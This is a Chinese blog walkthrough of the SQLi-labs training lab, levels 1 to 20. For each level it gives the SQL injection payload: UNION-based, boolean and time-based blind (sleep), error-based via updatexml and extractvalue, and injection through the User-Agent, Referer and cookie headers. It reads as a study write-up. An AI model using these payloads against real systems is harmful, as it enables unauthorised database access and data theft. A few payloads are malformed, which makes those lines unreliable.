sqlilabs(1-20)

最新推荐文章于 2024-09-15 08:03:51 发布
最新推荐文章于 2024-09-15 08:03:51 发布
阅读量49 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47391907/article/details/134751414
版权

Less-1:

Id=1' union select 1,2,3 from users --+

Less-2:

Id=1' union select 1,2,3 from users--+ 失效

原因为何:

可以看到:$id 不再被 ' ' 号闭合,故自己构造的sql语句是不会在数据库执行的,即使源代码有回显,但是源代码中回显的数据来源是执行了sql语句的结果。而源码的执行sql语句中,只是把 $id 当作一个整形变量,并不是一个可解析的字符串(没有‘’号闭合)。

然而,整形变量 可以利用布尔语句进行判断:

If 、 and 、or 、=

构造如下:

?id=1 and 1=if (database()='security',1,0)--+

这种情况可以升级为布尔型盲注入(即无任何回显),但是可以通过burp来对进行id参数进行爆破,从而获取数据库的信息(前提是存在注入点)

Less-3:

以上的构造又不行了。原因是

可以看到,$id 不仅被 ‘’ 号包裹,外面还多了一层()。虽然也是存在sql注入,但是我们构造的sql语句要考虑()号包裹的问题。且在括号内,sql语句是执行不了的。所以要想办法把( 这个符号闭合后,再执行我们的sql语句。

构造如下:

?id=-1')union select 1,2,3 from users --+

成功注入。

Less-4:提示是 双引号包裹错误,但是在双引号外还会有一层()号包裹

构造语句的思路是,让 id 查询正确执行的同时,且执行构造的sql语句

构造如下:

?id=-1")union select 1,2,3 from users--+

成功注入。

Less-5:查询结果无回显,提示是让我们进行二次注入,但是在实战中,找到注入点基本就完事了。

对于无回显的注入,如何判断存在注入点?可以利用sleep()。

在less-5中,只是对查询结果没有回显,但是有报错回显。

构造如下:

?id=-1 ’ and  select 1,2,3 from users--+

成功注入:即使id=负值,也会查询到结果,说明数据库执行了我们构造的语句

Less-6:双引号报错,对比less-4,还少了()包裹,故还简单了

构造如下:

?id=-1"union select 1,2,3 from users--+

成功注入。

Less-7:提示是dumping outfile ,啥玩意?

从源码看,只是多用了两层()号包裹,如法炮制:

?id=-1 ' ))union select 1,2,3 from users--+

用两个 ) 号去包裹 $id ,并同时执行我们构造的sql 语句,成功注入。

Less-8:布尔盲注,无报错,无查询结果回显

构造如下:

?id=-1 ' union select 1,2,3 from users--+

同样,id=-1,正常来说是不会回显东西,但是执行了后续的sql语句所以还是会出现回显。

Less-9:盲注,利用sleep

构造如下:

?id=1 ' and sleep(5)--+

可以看到,页面延时了5s,故执行了sleep(5)语句,利用时可以把sleep(5)替换成盲注时的判断语句:if、substring等等一些爆破语句

Less-10:双引号包裹,盲注入

构造如下:

?id=1"and sleep(5) --+

成功注入。

Less-11:

猜测查询的语句:

Select * from users where username = '$username' and password = '$password';

其中,$username 是输入的用户名,$password 是输入的密码。

那么,我们注入的地方有两个,username 和 password ,但是如何选取?

正常来说,应该是password。因为这条sql语句的尾端就是查询密码的时候。其实 username 也可以,只要注释掉后面的sql语句

构造如下:

不起效果,这里是因为post 中的sql注释符,只能选 “#”

其实就是和我猜测的一样,有很多种方式过。

构造如下:1' union select 1,2 from users #

Less-12: 双引号包裹+括号

构造如下:

username: dumb

password:dumb1 ")union select 1,2 from users#

成功注入。

Less-13:单引号包裹 + 括号

构造如下:

dumb' ) union select 1,2 from users --+

成功注入。

Less-14:双引号包裹,无回显

dumb " union select 1,2 from users #

Less-15:单引号包裹,时间盲注入

在源码中,它把用户名和密码的回显注释掉了,但是没关系只要它执行了我们构造的sql语句即可。

username:dumb

password:123 ' union select 1,2 from users #

成功注入。

Less-16:布尔盲注入,双引号+括号

构造如下:

123 ") union select 1,2 from users#

成功注入。

Less-17:使用了一些过滤手段,且更换了一种语句(update)

在常规的过滤方法(没有使用pdo,利用gpc和addcslashes、mysql_real_escape_string)

但是在less-17,没有对用户输入的password进行过滤

构造如下:

username:dumb

password:dumb' WHERE username='dumb'#

可以看到语句正常执行

构造如下:

username:dumb

password:dumb ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or'

考虑到这个是update语句,故使用updatexml()来进行报错注入。成功注入。

:updatexml 报错注入的前提是目标源码中有 print_r(mysql_error());

等报错函数的输出。

另外,还可以对其用sleep(),构造如下:

username:dumb

password:dumb ' or sleep(5)or '

利用extractvalue() 进行注入:

' or extractvalue(1,concat(0x5e24,(database()))) or '

可是,如果还想在username 进行注入,那么就要绕过gpc、addcslashes()等等:

首先,考虑二次注入。

//查询:SELECT username, password FROM users WHERE username= $uname LIMIT 0,1;

// 更新: $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

可以看见,在第二条update语句中,$row1是从$row中的['username']来对,且$row是数据库中用户名的查询结果。而查询前,代码对用户名输入进行了过滤。第二条update语句并没有使用到用户输入的username,故在username不存在二次注入。(也没有insert、update语句去更新username)

考虑编码绕过,查看数据库编码,为gbk。(没有复现成功)

Mysql_real_escape_string (): 主要用来对字符串进行转义

Mysql_escape_string ():

Gpc:

Less-18:

username:dumb

Password:0 (这里的密码在之前的关卡全修改为0了,在后台可以查看下密码)

回显出现了 http-agent,这里可能有三种情况:

  1. 数据库存储你发送的http头,并查询回显,或回显再存储
  2. 前端代码(js)来解析你的http包,回显页面
  3. 后端代码(php、java)解析你的http包,回显

对于username、password,都对其进行过滤。

但是注意到:目标服务器还会读取客户端发送的http头

其中,$iptcp协议中读取的?

然后,使用insert 语句且没有过滤。(注册、上传)

bp抓包,注意到目标系统在输入正确用户名、密码才会insert:

构造如下: ' or sleep(5) or'  也可以利用报错注入updatexml(),因为目标系统也有 print(mysql_error)

当然,这些可以利用的条件在真实情况中会减少非常多,比如报错、没有过滤等等。

Less-19:同样的,在http的referer 存在注入

Less-20:cookie 注入

客户端提交的cookie在某一个http中,利用bp捕获:

同时,delect cookie 也会 submit ,两个包都是利用 username来绑定。猜测逻辑:登录->insert cookie (by username)->delect cookie(by username);

构造如下:

没有利用成功。

将sleep(5) 后面语句注释掉

成功利用。

源码审计:

可以看到,只有$_cookie['uname'] 不存在,才会执行form 表单,故可以看到为什么要 删除cookie。

用户名、密码都被过滤。

在通过登录验证后,若没有cookie,就给客户端设置cookie(设置为用户名)

同时,若存在cookie:

显示后续页面,即显示客户端http包的内容、删除cookie的选项。

注意到这里,有一个没有经过过滤的cookie查询,如果可以修改这个cookie,那么就会触发sql注入。(事实上也是这么利用的)。且这里有好几个header(),所以页面逻辑:

有无cookie:

  • 有,进入回显,给出删除cookie的选项(设置cookie时间),回到登录页面
  • 无,登录页面
  • 如果在1.中删除cookie,刷新index.php,根据逻辑会进入到2.

关于 setcookie():

那么我们可以自己构建cookie:

观察到源码:

数据包:

在输入用户名、密码时;构造如下:

胃不好,消化不了领导的饼
关注
SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十关,sqllabs less-20sqli-labs less20
sqlilabs 1-20闯关记录
m0_63253040的博客
04-08 4444
sqlilabs1-20关wp Less-7 msql传马 今天看wp,研究了一下判断整数型字符型的原理 感觉一种是根据回显的报错判断,另一种就是想办法拿到源代码,直接看语句判断 这里整形就是没有引号和括号包裹的,字符型就是由单双引号和括号组合包裹 整形的判断另外有方法 可以看之前的博客我现在不愿找 字符型判断 直接分别输入单双引号,报错则是该引号包裹 然后再测试括号后面一个括号一个括号加,记得加上注释,不报错的时候就对了 这题第七关则是一个单引号加上两个括号')) 然后这题
sqlilabs1-20详细教程
黑白的博客
10-06 8211
声明 学习SQL注入 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show databases;
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1164
Sqli-labs-master靶场1-20通关教程
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2319
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
【Web安全靶场】sqli-labs-master 1-20 BASIC-Injection
likinguuu的博客
02-27 1313
【Web安全靶场】sqli-labs-master 1-20 BASIC-Injection
小白勇闯sqli-labs-master1-22关
weixin_56594114的博客
07-25 244
id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。输入admin') and 1=1 # 存在注入。输入正确的用户名密码,显示如下页面。
sqli_labs 1-20攻略
ANOrange的博客
09-08 1306
sqllib1-20关,详细,多图!
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 994
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
sqlilabs1-75
09-03
- *1* *2* [sqlilabs1-20详细教程](https://blog.csdn.net/zy15667076526/article/details/108941193)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...
Sqli-labs--less-5
weixin_43902454的博客
07-20 196
less 5 GET字符型,报错注入 基本可以确定是单引号字符型。但是发现使用平常的 union select ,没有任何反应。 如果返回的结果正确就只能返回you are in…,不能得到我们要的数据,所以采用报错注入。 1.我们采用floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x ...
4.网络编程
weixin_45476535的博客
09-14 459
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1110
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
55 mysql 的登录认证流程
最新发布
970655147的专栏
09-15 817
这里我们来看一下 mysql 的认证的流程我们这里仅仅看 我们最常见的一个 认证的处理流程我们经常会登录的时候 碰到各种异常信息大概的流程是这样客户端和服务器建立连接之后, 服务器向客户端发送 salt然后 客户端根据 salt 将客户端传入的密码加密之后, 以及相关登录信息传递给服务器然后 服务器进行验证, 验证失败, 响应对应的错误信息给客户端服务器发送 salt 的信息如下客户端发送的认证请求如下服务器响应的认证失败信息如下。
110个oracle常用函数总结
m516387177的博客
09-12 833
nvl2 (expr1, expr2, expr3) ->expr1不为null,返回expr2;为null,返回expr3。nvl(expr1, expr2)->expr1为null,返回expr2;不为null,返回expr1。求最大值,all表示对所有的值求最大值,distinct表示对不同的值求最大值,相同的只取一次。求最小值,all表示对所有的值求最小值,distinct表示对不同的值求最小值,相同的只取一次。nullif (expr1, expr2) ->相等返回null,不等返回expr1。
PHP在现代Web开发中的高效应用与最佳实践
运维人生
09-13 1028
我们将使用Laravel框架来构建一个简单的博客系统,该系统包括文章发布、编辑、查看和评论等功能。PHP作为一门成熟且强大的服务器端脚本语言,在现代Web开发中依然扮演着重要角色。通过遵循最佳实践、利用现代PHP版本的特性和成熟的框架与组件,开发者可以高效构建出稳定、安全、可扩展的Web应用。本文通过一个简单的博客系统案例,展示了PHP在实际项目中的应用方法和技巧,希望能为PHP开发者提供一些有益的参考和启发。
转行软件测试工程师经验总结
2402_84109700的博客
09-12 557
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。在测试理论方面,要熟悉常用的测试用例设计方法,理解不同测试类型的特点,掌握测试用例的基本格式,以及测试结束的标准。最终,我如愿以偿地加入了一家互联网公司,这里的办公环境优越,薪资也较之前的工作有所提升,使我心情愉悦。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值